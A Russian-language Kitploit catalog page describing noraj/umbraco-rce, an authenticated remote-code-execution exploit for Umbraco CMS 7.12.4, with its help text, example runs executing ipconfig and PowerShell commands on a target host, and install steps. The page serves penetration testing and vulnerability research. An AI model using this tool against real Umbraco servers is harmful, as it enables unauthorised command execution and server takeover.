Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Umbraco-RCE — Umbraco CMS 7.12.4 - (Аутентифицированное) удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/noraj/umbraco-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubnoraj/umbraco-rce

Umbraco-RCE

Umbraco CMS 7.12.4 - (Аутентифицированное) удаленное выполнение кода

Репозиторий
79405 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Эксплойт Umbraco RCE / PoC

Umbraco CMS 7.12.4 — (аутентифицированное) удалённое выполнение кода

[EDB-49488] [PacketStorm] [WLB-2020080012]

Использование

root@kitploit:~
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Примеры:

root@kitploit:~
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Требования

  • Beautiful Soup
  • Requests

Пример для ArchLinux:

root@kitploit:~
pacman -S python-beautifulsoup4 python-requests

Пример с использованием pip:

root@kitploit:~
pip3 install -r requirements.txt

Ссылка

Это улучшенная переработка EDB-ID-46153 с использованием аргументов (вместо захардкоженных значений) и выводом в stdout.

Протестировано с python 3.8.

Скачать инструмент